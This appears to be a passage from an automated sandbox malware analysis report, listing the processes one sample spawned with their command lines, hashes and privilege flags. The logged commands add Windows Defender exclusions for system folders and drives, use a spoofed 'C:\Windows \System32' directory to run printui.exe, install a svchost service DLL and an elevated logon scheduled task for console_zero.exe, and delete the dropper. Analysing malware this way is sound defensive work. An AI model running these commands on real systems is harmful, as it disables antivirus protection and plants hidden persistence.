                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:10:19:55
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c start "" "C:\Windows \System32\printui.exe"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows \System32\printui.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows \System32\printui.exe"
                                                                                            Imagebase:0x7ff616b10000
                                                                                            File size:64'000 bytes
                                                                                            MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\58VSNPxrI4.exe"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:15
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:16
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:17
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:18
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:timeout /t 10 /nobreak
                                                                                            Imagebase:0x7ff63c990000
                                                                                            File size:32'768 bytes
                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:19
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:21
                                                                                            Start time:10:20:03
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f && sc start x939048
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:22
                                                                                            Start time:10:20:03
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:23
                                                                                            Start time:10:20:03
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                                                                                            Imagebase:0x7ff68d2c0000
                                                                                            File size:72'192 bytes
                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:24
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f
                                                                                            Imagebase:0x7ff74c870000
                                                                                            File size:77'312 bytes
                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:25
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:sc start x939048
                                                                                            Imagebase:0x7ff68d2c0000
                                                                                            File size:72'192 bytes
                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:26
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k DcomLaunch
                                                                                            Imagebase:0x7ff67e6d0000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:27
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:28
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:29
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:30
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:31
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:32
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\console_zero.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\console_zero.exe"
                                                                                            Imagebase:0x7ff70f270000
                                                                                            File size:664'576 bytes
                                                                                            MD5 hash:4ECCB8F5D1EDCF18A11ABED91FF85C46
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 42%, ReversingLabs
                                                                                            Has exited:true

                                                                                            Target ID:33
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:34
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:35
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff63ed60000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:36
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:37
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows \System32\printui.dll"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:38
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:39
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:40
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:timeout /t 14 /nobreak
                                                                                            Imagebase:0x7ff63c990000
                                                                                            File size:32'768 bytes
                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:41
                                                                                            Start time:10:20:05
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:timeout /t 16 /nobreak
                                                                                            Imagebase:0x7ff63c990000
                                                                                            File size:32'768 bytes
                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:42
                                                                                            Start time:10:20:06
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\console_zero.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\console_zero.exe
                                                                                            Imagebase:0x7ff70f270000
                                                                                            File size:664'576 bytes
                                                                                            MD5 hash:4ECCB8F5D1EDCF18A11ABED91FF85C46
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:43
                                                                                            Start time:10:20:06
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:44
                                                                                            Start time:10:20:06
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:45
                                                                                            Start time:10:20:06
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff63ed60000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:46
                                                                                            Start time:10:20:07
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:47
                                                                                            Start time:10:20:07
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:48
                                                                                            Start time:10:20:07
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:49
                                                                                            Start time:10:20:10
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:50
                                                                                            Start time:10:20:10
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:51
                                                                                            Start time:10:20:10
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:52
                                                                                            Start time:10:20:13
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:53
                                                                                            Start time:10:20:13
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:54
                                                                                            Start time:10:20:13
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:56
                                                                                            Start time:10:20:20
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701104182.00007FF783AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF783AA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701083040.00007FF783AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1702273266.00007FF784898000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1702404346.00007FF78489B000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ff783aa0000_58VSNPxrI4.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                              • String ID:
                                                                                              • API String ID: 2933794660-0
                                                                                              • Opcode ID: c11a42863fb02dfb8797a2c878325fc12a919f5be676ba5f29d2ddb3a51f65d9
                                                                                              • Instruction ID: 2ccc9f0c3555c2dfcd7bd788613d70e7ccafd3b740d098e34dfe7b7e991ec160
                                                                                              • Opcode Fuzzy Hash: c11a42863fb02dfb8797a2c878325fc12a919f5be676ba5f29d2ddb3a51f65d9
                                                                                              • Instruction Fuzzy Hash: 49117336B14F0689EB40EF64EC542B873A4F719758F840E35EA6D82764DF78D164C350

                                                                                              Execution Graph

                                                                                              Execution Coverage:34.4%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:34.2%
                                                                                              Total number of Nodes:73
                                                                                              Total number of Limit Nodes:2

                                                                                              Callgraph

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.1759120025.00007FF616B11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF616B10000, based on PE: true
                                                                                              • Associated: 0000000D.00000002.1759094187.00007FF616B10000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp
